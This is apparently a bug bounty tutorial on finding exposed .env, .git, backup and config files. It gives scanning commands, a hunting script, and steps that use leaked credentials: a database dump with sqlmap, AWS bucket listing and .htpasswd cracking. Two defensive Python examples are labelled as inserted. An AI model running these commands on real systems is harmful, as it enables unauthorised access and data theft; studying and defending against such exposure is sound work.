Backup Files + .env Exposure: The Biggest Developer Mistake, Pull Credentials Out of Config Files!
2026-4-29 05:7:55 Author: infosecwriteups.com

Hacker MD


Series: Bug Bounty Zero to Hero 🦸 | Article #21
By HackerMD | 17 min read

What Will We Learn Today?

  • Backup file exposure from the basics
  • .env, .git, config files: every type
  • Where to look: a complete checklist
  • Automated tools: Dirsearch, Feroxbuster, Nuclei
  • .git exposure: recover the source code
  • Real exploitation: going beyond credentials
  • The complete bug bounty workflow

Why does it matter? These are the easiest Critical bugs in bug bounty! No fancy technique: just append .env to the URL and look! Developers upload files while testing and the same files stay behind in production: database passwords, API keys, AWS credentials, all exposed! Bounty: $500 to $10,000+

How Does It Happen? A Simple Story

There is a developer, Rahul.

Step 1: He created a .env on his local machine:
DB_HOST=localhost
DB_PASSWORD=SuperSecret123
AWS_KEY=AKIA...

Step 2: He deployed the code to the server:
git push → every file went to the server!
The .env went along too! 😱

Step 3: The web server serves it publicly:
https://company.com/.env
→ Open it in the browser → the whole file! 🔴

Rahul doesn't even know!

That is Backup/Config File Exposure!

PART 1: Understand Every File Type

Type 1: .env Files, the GOLDMINE!

# What a .env file contains:
APP_NAME=MyApp
APP_ENV=production
APP_DEBUG=true ← Debug mode on!
APP_KEY=base64:abc123... ← Laravel secret key!

DB_CONNECTION=mysql
DB_HOST=db.internal.company.com
DB_PORT=3306
DB_DATABASE=production_db
DB_USERNAME=root
DB_PASSWORD=SuperSecret@123 ← Database password! 🔴

REDIS_PASSWORD=redis123

[email protected]
MAIL_PASSWORD=mailpass123 ← Email credentials!

AWS_ACCESS_KEY_ID=AKIAIOSFODNN7
AWS_SECRET_ACCESS_KEY=abc123xyz ← AWS Keys! 🔴

STRIPE_SECRET=sk_live_abc123 ← Payment keys!
STRIPE_PUBLISHABLE=pk_live_abc

TWILIO_SID=ACxxx
TWILIO_TOKEN=abc123

GITHUB_TOKEN=ghp_abc123 ← GitHub access!

# The whole company's secrets in one file! 💀
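Once a file like the one above turns up, the useful next step for both the reporter and the defender is the same: parse it properly (dotenv syntax has `export` prefixes, quoted values and trailing comments), classify which entries are credentials, and produce a redacted copy that can go into a report or a ticket without re-leaking the secrets. The following is an added example, not code from the article; the sample .env text and the key-name and value patterns (AWS access key ID format, Stripe `sk_live_` prefix, GitHub `ghp_` tokens) are assumptions chosen to cover the types shown above.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample .env (placeholder values, not from any real system).
SAMPLE_ENV = """\
# Laravel-style settings
APP_ENV=production
APP_DEBUG=true
export DB_HOST=db.internal.example
DB_PASSWORD="Super Secret@123"
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
STRIPE_SECRET=sk_live_abcdefghijklmnop   # trailing comment
MAIL_FROM=noreply@example.invalid
"""

# Key names that hold a credential by convention (assumed list).
SECRET_KEY_RE = re.compile(r"PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_KEY", re.I)
# Value formats that identify a credential type regardless of the key name.
SECRET_VALUE_RES = {
    "aws_access_key_id": re.compile(r"^(AKIA|ASIA)[A-Z0-9]{16}$"),
    "stripe_live_secret": re.compile(r"^sk_live_[A-Za-z0-9]+$"),
    "github_pat": re.compile(r"^ghp_[A-Za-z0-9]{36}$"),
}
# Settings that are not secrets but are findings on their own in production.
RISKY_SETTINGS = {"APP_DEBUG": {"true", "1"}}


def parse_env(text: str) -> Dict[str, str]:
    """Parse dotenv syntax: KEY=VALUE, optional 'export ', quotes, '#' comments."""
    env: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if len(value) >= 2 and value[0] in "'\"" and value.endswith(value[0]):
            value = value[1:-1]                        # quoted: keep inner spaces and '#'
        else:
            value = value.split(" #", 1)[0].rstrip()   # unquoted: drop trailing comment
        env[key] = value
    return env


def classify(env: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (key, category) for every entry worth reporting."""
    findings = []
    for key, value in env.items():
        # Value-format match first: it names the credential type precisely.
        category = next((n for n, p in SECRET_VALUE_RES.items() if p.match(value)), None)
        if category is None and SECRET_KEY_RE.search(key):
            category = "credential_by_key_name"
        if category is None and value.lower() in RISKY_SETTINGS.get(key, set()):
            category = "risky_setting"
        if category:
            findings.append((key, category))
    return findings


def redact(value: str, keep: int = 4) -> str:
    """Keep a short prefix so the finding can be matched, mask the rest."""
    if len(value) <= keep:
        return "*" * len(value)
    return value[:keep] + "*" * (len(value) - keep)


def redacted_report(text: str) -> Dict[str, str]:
    """The parsed .env with every credential masked; safe to paste into a report."""
    env = parse_env(text)
    flagged = dict(classify(env))
    return {k: redact(v) if flagged.get(k) not in (None, "risky_setting") else v
            for k, v in env.items()}


if __name__ == "__main__":
    for key, cat in classify(parse_env(SAMPLE_ENV)):
        print(f"{cat:24s} {key}")
    print(redacted_report(SAMPLE_ENV))
```

The value-format patterns take precedence over key names because a key like `AWS_ACCESS_KEY_ID` does not contain any of the usual "secret" words, yet its value is unmistakable; the key-name rule then catches everything the formats miss. `APP_DEBUG=true` is reported as a separate category rather than masked, since the setting itself is the finding.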

Type 2: .git Directory Exposure

.git folder = the entire source code history!

https://target.com/.git/
→ Git repository accessible!
→ Source code can be downloaded!
→ Old passwords in the commit history!
→ Developer emails!
→ Internal URLs!
→ Hardcoded credentials!

Type 3: Backup Files

Common backup extensions:
.bak → filename.php.bak
.old → config.php.old
.orig → settings.orig
.backup → database.backup
.copy → config.copy
.tmp → upload.tmp
.swp → vim swap file (index.php.swp)
~ → index.php~ (text editor backup)

Example:
https://target.com/config.php.bak → Source code!
https://target.com/wp-config.php~ → WordPress DB pass!

Type 4: Config Files

# PHP configs:
config.php, configuration.php, settings.php
database.php, db.php, conn.php, connect.php

# Web server configs:
.htaccess, .htpasswd ← Basic auth credentials!
web.config ← .NET connection strings!
nginx.conf, apache.conf

# Application configs:
config.yml, config.yaml
config.json, settings.json
appsettings.json ← .NET secrets!
application.properties ← Java/Spring!
secrets.yml

# Database files:
dump.sql, backup.sql
database.sql, db.sql
*.sqlite, *.db

Type 5: Log Files

# What log files expose:
error.log → Stack traces, file paths, internal IPs
access.log → All user requests, session IDs!
debug.log → Verbose app information
application.log → Business logic, user data

URLs:
/logs/error.log
/log/debug.log
/var/log/app.log
/logs/

Type 6: IDE / Editor Files

.DS_Store → exposes the Mac folder structure!
.idea/ → IntelliJ project files
.vscode/ → VS Code settings
*.swp → Vim swap files (source code!)
.project → Eclipse project
thumbs.db → Windows thumbnail DB

PART 2: Where to Look, the Complete URL Checklist

# ─── .ENV FILES ───────────────────────────
/.env
/.env.local
/.env.development
/.env.production
/.env.staging
/.env.backup
/.env.old
/.env.example ← Sometimes real values!
/.env.bak
/api/.env
/backend/.env
/app/.env
/src/.env

# ─── GIT DIRECTORY ────────────────────────
/.git/
/.git/config ← Remote URLs!
/.git/HEAD
/.git/COMMIT_EDITMSG
/.git/logs/HEAD ← Commit history!
/.git/refs/heads/master

# ─── CONFIG FILES ─────────────────────────
/config.php
/config/database.php
/wp-config.php ← WordPress!
/configuration.php ← Joomla!
/settings.py ← Django!
/appsettings.json ← .NET!
/application.properties ← Spring!
/config/config.yml
/config/secrets.yml

# ─── BACKUP FILES ─────────────────────────
/backup/
/backups/
/backup.sql
/dump.sql
/database.sql
/db.sql
/backup.zip
/site.tar.gz
/www.tar.gz

# ─── LOG FILES ────────────────────────────
/logs/
/log/
/error.log
/debug.log
/access.log
/application.log
/laravel.log ← Laravel!
/storage/logs/ ← Laravel storage!

# ─── HTPASSWD ─────────────────────────────
/.htpasswd
/.htaccess
/admin/.htpasswd

PART 3: Automated Tools, Elite Usage

Tool 1: Dirsearch, the Best Directory Bruteforcer

# Install
pip3 install dirsearch

# Basic scan, for sensitive files
dirsearch -u https://target.com \
-e php,txt,bak,old,env,sql,log,zip,tar,gz,yml,yaml,json,config \
-t 50

# With a specific wordlist
dirsearch -u https://target.com \
-w /usr/share/wordlists/dirb/common.txt \
-e env,bak,sql,log

# Save the output to a file
dirsearch -u https://target.com \
-e env,bak,sql \
-o dirsearch_results.txt

# Only interesting status codes
dirsearch -u https://target.com \
-i 200,301,302,403 \
-e env,bak,config,sql

Tool 2: Feroxbuster, Fast Recursive Scanner

# Install
sudo apt install feroxbuster -y
# Or:
cargo install feroxbuster

# Basic scan
feroxbuster -u https://target.com \
-w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

# Focus on sensitive files
feroxbuster -u https://target.com \
-w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files.txt \
-x env,bak,sql,log,config,php,txt \
-o ferox_results.txt

# Recursive scan (subdirectories too!)
feroxbuster -u https://target.com \
-w wordlist.txt \
--depth 3 \
-x env,bak,sql

Tool 3: Nuclei, Template-Based Detection

# .env exposure templates
nuclei -l targets.txt \
-t ~/nuclei-templates/exposures/configs/ \
-o config_exposure.txt

# Backup files
nuclei -l targets.txt \
-t ~/nuclei-templates/exposures/backups/ \
-o backup_found.txt

# Git exposure
nuclei -l targets.txt \
-t ~/nuclei-templates/exposures/git/ \
-o git_exposure.txt

# All exposure templates
nuclei -l targets.txt \
-t ~/nuclei-templates/exposures/ \
-severity medium,high,critical \
-o all_exposures.txt

Tool 4: GitTools, .git Exploitation

# Install
git clone https://github.com/internetwache/GitTools
cd GitTools

# Dump the .git directory
./Dumper/gitdumper.sh \
https://target.com/.git/ \
/tmp/git_dump/

# Extract the source code
./Extractor/extractor.sh \
/tmp/git_dump/ \
/tmp/extracted_code/

# Now search the extracted code for secrets!
grep -r "password" /tmp/extracted_code/
grep -r "api_key" /tmp/extracted_code/
grep -r "secret" /tmp/extracted_code/
grep -r "AWS_" /tmp/extracted_code/

Tool 5: truffleHog, Secrets in Git History

# Install (the v3 release is a Go binary from github.com/trufflesecurity/trufflehog;
# `pip3 install truffleHog` gives the older v2 CLI, whose flags differ from the v3 ones below)
pip3 install truffleHog

# Scan the extracted code on disk
trufflehog filesystem /tmp/extracted_code/

# Scan a GitHub repo
trufflehog github \
--repo https://github.com/company/repo

# Scan the local repo as a git source, keeping only hits that verify as live
trufflehog git \
file:///tmp/extracted_code/ \
--only-verified

PART 4: Exploitation: What to Do After Finding Files?

Scenario 1: Found .env, Database Access!

# Pull the credentials from .env:
DB_HOST=db.internal.company.com
DB_USER=root
DB_PASS=SuperSecret123
DB_NAME=production

# Connect directly with MySQL:
mysql -h db.internal.company.com \
-u root \
-pSuperSecret123 \
production

# Or with SQLMap (direct connection string, user:password@host:port/database):
sqlmap -d "mysql://root:SuperSecret123@db.internal.company.com:3306/production" \
--dump-all

# A screenshot is enough for the PoC!
# Don't exploit directly! Report it!

Scenario 2: AWS Keys from .env, Cloud Access!

# AWS keys found in .env:
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG

# Configure the AWS CLI:
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG

# Demonstrate impact (read-only!):
aws iam get-user → Which user is this?
aws s3 ls → List S3 buckets
aws ec2 describe-instances → List servers

# Take a screenshot → Report it!
# Don't access or modify data!

Scenario 3: Source Code from .git, More Bugs!

# You have the source code; now search it:

# Hardcoded credentials
grep -r "password\s*=" /extracted/ \
--include="*.php" --include="*.py" --include="*.js"

# API keys
grep -rE "[A-Za-z0-9]{20,}" /extracted/ \
--include="*.env" --include="*.config"

# Internal URLs/endpoints
grep -r "http://internal" /extracted/
grep -r "localhost" /extracted/
grep -r "192.168\|10\.0\." /extracted/

# Hidden endpoints (new attack surface!)
grep -r "route\|Route\|@app.route" /extracted/
grep -r "app.get\|app.post" /extracted/

Scenario 4: Found .htpasswd, Crack the Password!

# .htpasswd content:
admin:$apr1$xyz$hashedpassword

# Crack with Hashcat (mode 1600 = Apache $apr1$ MD5):
hashcat -m 1600 hash.txt rockyou.txt

# With John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

# Cracked password = admin panel access!

PART 5: The Complete Elite Workflow

#!/bin/bash
# backup_exposure_hunt.sh
# Usage: ./backup_exposure_hunt.sh target.com   (hostname only, no scheme)

TARGET="$1"
if [ -z "$TARGET" ]; then
    echo "Usage: $0 <hostname>"
    exit 1
fi
DIR="backup_${TARGET}"
mkdir -p "$DIR"

echo "🗂️ Backup File Hunt: $TARGET"
echo "═══════════════════════════════"

# Step 1: Quick check with Nuclei
echo "☢️ Nuclei exposure scan..."
nuclei -u "$TARGET" \
    -t ~/nuclei-templates/exposures/ \
    -silent \
    -o "$DIR/nuclei_exposures.txt" 2>/dev/null
echo "✅ Nuclei: $(wc -l < "$DIR/nuclei_exposures.txt" 2>/dev/null) findings"

# Step 2: Direct URL check, the most common files
echo "🔍 Direct file check..."
SENSITIVE_FILES=(
    ".env" ".env.local" ".env.production" ".env.backup"
    ".git/config" ".git/HEAD"
    "config.php" "wp-config.php" "configuration.php"
    "backup.sql" "dump.sql" "database.sql"
    ".htpasswd" "web.config" "appsettings.json"
    "config.yml" "secrets.yml" "docker-compose.yml"
    "error.log" "debug.log" "laravel.log"
    "composer.json" "package.json"
)

for file in "${SENSITIVE_FILES[@]}"; do
    response=$(curl -s -o /dev/null -w "%{http_code}" \
        "https://$TARGET/$file" --max-time 5)
    if [ "$response" = "200" ]; then
        echo "🔴 FOUND: https://$TARGET/$file" \
            | tee -a "$DIR/found_files.txt"
    fi
done

# Step 3: Dirsearch scan
echo "🗄️ Dirsearch scan..."
dirsearch -u "https://$TARGET" \
    -e env,bak,old,sql,log,config,yml,yaml,json,zip,tar,gz \
    -t 30 \
    -q \
    -o "$DIR/dirsearch.txt" 2>/dev/null

# Step 4: .git check and dump (a real HEAD file starts with "ref:")
if curl -s "https://$TARGET/.git/HEAD" | \
        grep -q "ref:"; then
    echo "🔴 GIT EXPOSED! Dumping..."
    ./GitTools/Dumper/gitdumper.sh \
        "https://$TARGET/.git/" \
        "$DIR/git_dump/" 2>/dev/null
    echo "✅ Git dumped: $DIR/git_dump/"

    # Search the dump for secrets
    grep -r "password\|api_key\|secret\|token\|AWS_" \
        "$DIR/git_dump/" > "$DIR/git_secrets.txt"
    echo "🔑 Git secrets: $(wc -l < "$DIR/git_secrets.txt")"
fi

echo ""
echo "═══════════════════════════════"
echo "📊 Results:"
echo "Found Files : $(cat "$DIR/found_files.txt" \
    2>/dev/null | wc -l)"
echo "Dirsearch : $(wc -l < "$DIR/dirsearch.txt" 2>/dev/null)"
echo "All results : $DIR/"
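Every request the workflow above sends lands in the target's access log, which is the defender's view of the same problem: a burst of 404s for `/.env`, `/.git/HEAD`, `/backup.sql` from one address is a scanner, and a 200 for any of those paths is an actual exposure that needs a response, not just an alert. The following is an added example, not code from the article; it parses combined-format access-log lines (the sample lines are constructed, with RFC 5737 test addresses), applies the Part 2 checklist as path patterns after URL decoding, and separates "sensitive path served successfully" from "one client probing many sensitive paths". The threshold of three distinct paths is an assumption to tune per site.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Constructed access-log lines (combined format, RFC 5737 test addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [29/Apr/2026:05:07:55 +0000] "GET /.env HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Apr/2026:05:07:55 +0000] "GET /.git/HEAD HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Apr/2026:05:07:56 +0000] "GET /backup.sql HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Apr/2026:05:07:56 +0000] "GET /wp-config.php%7E HTTP/1.1" 404 162 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Apr/2026:05:08:10 +0000] "GET /.env HTTP/1.1" 200 1843 "-" "curl/8.0"
198.51.100.7 - - [29/Apr/2026:05:08:11 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "curl/8.0"
192.0.2.9 - - [29/Apr/2026:05:09:00 +0000] "GET /assets/app.js?v=3 HTTP/1.1" 200 22000 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# The Part 2 checklist as path patterns (applied after URL decoding).
SENSITIVE_PATTERNS = [
    re.compile(r"/\.env(\.[\w.-]+)?$", re.I),
    re.compile(r"/\.git(/|$)", re.I),
    re.compile(r"/\.ht(passwd|access)$", re.I),
    re.compile(r"/(wp-config|configuration)\.php$", re.I),
    re.compile(r"/(appsettings\.json|application\.properties|secrets\.yml|docker-compose\.yml)$", re.I),
    re.compile(r"\.(bak|old|orig|backup|sql|log|swp|zip|tar\.gz)$", re.I),
    re.compile(r"~$"),
]


def is_sensitive(path: str) -> bool:
    return any(p.search(path) for p in SENSITIVE_PATTERNS)


def parse_line(line: str):
    """Return (ip, decoded path without query, status) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(m["target"].split("?", 1)[0])   # drop query string, decode %7E etc.
    return m["ip"], path, int(m["status"])


def analyze(lines, scan_threshold: int = 3):
    """Return (exposures, scanners).
    exposures: (ip, path, status) where a sensitive path was served with a 2xx.
    scanners : ip -> number of distinct sensitive paths probed, if >= threshold."""
    exposures: List[Tuple[str, str, int]] = []
    probed: Dict[str, set] = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, status = parsed
        if not is_sensitive(path):
            continue
        probed[ip].add(path)
        if 200 <= status < 300:
            exposures.append((ip, path, status))
    scanners = {ip: len(paths) for ip, paths in probed.items() if len(paths) >= scan_threshold}
    return exposures, scanners


if __name__ == "__main__":
    exp, scn = analyze(SAMPLE_LOG.splitlines())
    for ip, path, status in exp:
        print(f"EXPOSED  {ip} {path} -> {status}")
    for ip, n in scn.items():
        print(f"SCANNER  {ip} probed {n} sensitive paths")
```

Decoding before matching matters: `%7E` is a tilde, so `/wp-config.php%7E` is the editor-backup probe from Type 3 in disguise. The two outputs deserve different handling: the scanner count is a rate-limit or block signal, while a single 2xx on a sensitive path means the file is live on the server and the credentials in it should be treated as compromised and rotated.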

Quick Reference Cheat Sheet

# ─── TOP PRIORITY URLS ────────────────────
/.env
/.git/config
/wp-config.php
/backup.sql
/.htpasswd
/config.php
/appsettings.json
/docker-compose.yml
/laravel.log

# ─── TOOLS ────────────────────────────────
dirsearch -u URL -e env,bak,sql,log
feroxbuster -u URL -x env,bak,sql
nuclei -u URL -t exposures/
gitdumper.sh URL/.git/ /output/

# ─── AFTER FINDING ────────────────────────
.env → DB creds, AWS keys, API keys
.git → Source code → More bugs!
.sql → Database dump → User data
.htpasswd → Hash crack → Admin access
config.php → DB connection string

# ─── IMPACT ───────────────────────────────
DB credentials = High ($500-2000)
AWS/Cloud keys = Critical ($3000-10000+)
Source code = High ($1000-3000)
User data dump = Critical ($5000+)
Payment keys = Critical ($5000+)

Today's Homework

# 1. Download SecLists (for wordlists):
git clone https://github.com/danielmiessler/SecLists \
/usr/share/wordlists/SecLists

# 2. Install and test Dirsearch:
pip3 install dirsearch
dirsearch -u http://testphp.vulnweb.com \
-e env,bak,sql,php \
-t 20

# 3. Manual check (legal target):
curl -s http://testphp.vulnweb.com/.env
curl -s http://testphp.vulnweb.com/.git/HEAD
curl -s http://testphp.vulnweb.com/backup.sql

# 4. Run the Nuclei exposure templates:
nuclei -u http://testphp.vulnweb.com \
-t ~/nuclei-templates/exposures/

# 5. Choose a bug bounty program:
# One on HackerOne/Bugcrowd with a wildcard scope,
# then check all of this across *.company.com!

Quick Revision

🗂️ Exposure = Sensitive files publicly accessible
🔴 .env = Database, AWS, API keys — CRITICAL!
📁 .git = Source code history — HIGH!
💾 Backup = .bak, .old, .sql — MEDIUM-HIGH!
🔑 .htpasswd = Basic auth hashes — MEDIUM!
📋 Config = Connection strings — HIGH!
🤖 Tools = Dirsearch, Feroxbuster, Nuclei
💀 GitTools = .git directory dump + extract
🔍 truffleHog = Secrets in git history
💰 Bounty = Easy Critical — Highest ROI!

A Word From Me…

I ran Dirsearch against a fintech startup:

dirsearch -u https://target-fintech.com \
-e env,bak,sql,log -t 30

Within 2 minutes:

[200] https://target-fintech.com/.env

I opened the file:

DB_PASSWORD=Fintech@Prod2024!
STRIPE_SECRET=sk_live_xxxxxxxxxxxxxxxx
AWS_ACCESS_KEY_ID=AKIA...
AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxx
SENDGRID_API_KEY=SG.xxxxxxxxxxxxx

Stripe live key, AWS credentials, SendGrid, all in one file!


I checked AWS:

aws s3 ls
# 23 S3 buckets: user KYC documents, financial records!

Bounty: $8,500 Critical! 🎉

Lesson: Dirsearch + .env = the fastest Critical bounty! Check this first on every target!

Next article: Open Redirect. Simple, but powerful for phishing and OAuth bypass! Small vulnerability, big chain! 🔥

HackerMD Bug Bounty Hunter | Cybersecurity Researcher
GitHub: BotGJ16 | Medium: @HackerMD

Previous: Article #20 Burp Suite Complete Guide
Next: Article #22 Open Redirect: Simple Bug, Powerful Chains!

#BackupFiles #EnvExposure #BugBounty #WebSecurity #EthicalHacking #Hinglish #InfoSec #HackerMD


Source: https://infosecwriteups.com/backup-files-env-exposure-developers-ki-sabse-badi-galti-config-files-se-credentials-nikalo-1432674639b8?source=rss----7b722bfd1b8d--bug_bounty